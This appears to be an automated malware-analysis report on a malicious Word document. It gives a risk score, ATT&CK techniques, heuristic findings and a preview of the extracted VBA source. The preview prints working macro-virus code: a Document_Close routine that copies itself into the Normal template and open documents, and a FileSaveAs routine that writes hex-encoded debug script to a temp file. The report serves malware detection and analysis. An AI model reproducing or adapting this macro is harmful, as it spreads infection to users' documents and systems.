MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1027 Obfuscated Files or Information
T1105 Ingress Tool Transfer
The sample contains a critical VBA macro that executes a Shell() command, indicating malicious intent. The macro attempts to write to a temporary file and then save a file disguised as a JPG, likely to download and execute a second-stage payload. The presence of legacy WordBasic markers and the Document_Open macro further support its malicious nature.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 108310 bytes |
SHA-256: cc034bb785ef7c374d10abf442770567760d34429aadf023d6093ec4709f3a68 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
'Pothead
'(c) by Necronomikon/ZeroGravity
End Sub
Private Sub Document_Close()
On Error Resume Next
On Error Resume Next: Randomize
Dim nec1 As Object, nec2 As Object, nec3 As Object, nec4 As Object, nec5 As Object
Dim thc As Object, lsd As Object, dope As Object, weed As Object, coke As Object
Set nec1 = ActiveDocument: Set nec2 = nec1.VBProject: Set nec3 = nec2.VBComponents: Set nec4 = nec3.Item(1): Set nec5 = nec4.CodeModule
Set thc = NormalTemplate: Set lsd = thc.VBProject: Set dope = lsd.VBComponents: Set weed = dope.Item(1): Set coke = weed.CodeModule
pshq = coke.countoflines: zero = nec5.countoflines: gravity = Chr(Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65)
If pshq < zero Then
For sysnec = 1 To pshq: NT5.replaceline sysnec, gravity: Next sysnec
For sysnec = 1 To zero: peace = nec5.lines(sysnec, 1): coke.insertlines sysnec, peace: Next sysnec
NormalTemplate.Save: End If
If zero < pshq Then
For sysnec = 1 To zero: nec5.replaceline sysnec, gravity: Next sysnec
For sysnec = 1 To pshq: peace = coke.lines(sysnec, 1): nec5.insertlines sysnec, peace: Next sysnec
ActiveDocument.Save: End If
End Sub
Sub FileSaveAs()
On Error Resume Next
Open Environ("WINDIR") & "\pothead.tmp" For Output As #1
Print #1, "n " & Environ("WINDIR") & "\POTHEAD.JPG"
Print #1, "e 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01"
Print #1, "e 0110 00 01 00 00 FF DB 00 43 00 06 04 05 06 05 04 06"
Print #1, "e 0120 06 05 06 07 07 06 08 0A 10 0A 0A 09 09 0A 14 0E"
Print #1, "e 0130 0F 0C 10 17 14 18 18 17 14 16 16 1A 1D 25 1F 1A"
Print #1, "e 0140 1B 23 1C 16 16 20 2C 20 23 26 27 29 2A 29 19 1F"
Print #1, "e 0150 2D 30 2D 28 30 25 28 29 28 FF DB 00 43 01 07 07"
Print #1, "e 0160 07 0A 08 0A 13 0A 0A 13 28 1A 16 1A 28 28 28 28"
Print #1, "e 0170 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28"
Print #1, "e 0180 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28"
Print #1, "e 0190 28 28 28 28 28 28 28 28 28 28 28 28 28 28 FF C2"
Print #1, "e 01A0 00 11 08 00 BD 02 37 03 01 22 00 02 11 01 03 11"
Print #1, "e 01B0 01 FF C4 00 1B 00 00 01 05 01 01 00 00 00 00 00"
Print #1, "e 01C0 00 00 00 00 00 00 05 01 02 03 04 06 00 07 FF C4"
Print #1, "e 01D0 00 19 01 00 03 01 01 01 00 00 00 00 00 00 00 00"
Print #1, "e 01E0 00 00 00 00 01 02 03 04 05 FF DA 00 0C 03 01 00"
Print #1, "e 01F0 02 10 03 10 00 00 01 2F 14 10 73 55 D1 D7 03 0E"
Print #1, "e 0200 F8 18 E9 53 96 47 2B A5 14 F3 02 0C ED 05 54 09"
Print #1, "e 0210 36 26 AD 4F A1 CD 95 39 0E CA 55 B0 9F 23 78 68"
Print #1, "e 0220 07 55 95 1D 8B D9 87 39 D0 A6 79 5C E8 9B 9D E1"
Print #1, "e 0230 1D 68 26 0C F2 E7 91 AD 0B B3 BC 07 98 09 8C 3D"
Print #1, "e 0240 10 56 81 89 00 A2 34 F5 46 56 03 8A 0D 40 F3 81"
Print #1, "e 0250 BC 0E 3C 0A 81 A7 04 7A 66 D0 3A 81 87 86 40 37"
Print #1, "e 0260 38 0B 20 42 C8 5A ED 69 22 CA 35 AD 4F 65 A5 0D"
Print #1, "e 0270 2D 8C 7C 21 B7 6E 76 EC D1 49 29 5C 40 85 AD 61"
Print #1, "e 0280 95 FA 3E A0 1A A4 FA E7 65 91 43 9E 8E E6 4E 0F"
Print #1, "e 0290 BC 35 EA 8B 70 DB 49 E8 68 02 95 33 D5 9B 24 B7"
Print #1, "e 02A0 8A 3F 94 6A FC 63 99 79 EF CB F9 8E A6 59 DC B9"
Print #1, "e 02B0 80 CA F3 4C 7B 36 C5 39 79 CA 73 95 0C 5B 37 95"
Print #1, "e 02C0 08 53 D6 A6 F3 6B AB 7A 78 D6 6B C7 39 03 C4 2B"
Print #1, "e 02D0 54 D7 E9 79 A7 D7 B9 58 19 CF 70 44 B3 28 40 93"
Print #1, "e 02E0 B4 22 59 38 51 A4 8D 04 E5 70 4B 1F 34 72 46 D9"
Print #1, "e 02F0 44 BD 25 E5 43 64 B3 18 25 53 A3 C2 27 C1 05 2B"
Print #1, "e 0300 66 03 D4 41 82 79 6D 94 50 3E 8F 86 3A CE 96 89"
Print #1, "e 0310 59 FE 27 68 06 5B F5 EA B9 D7 8D B7 6F 55 D6 7C"
Print #1, "e 0320 9D 49 96 8D D1 0F 9E 2E 02 90 F2 5A 8C 79 01 84"
Print #1, "e 0330
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.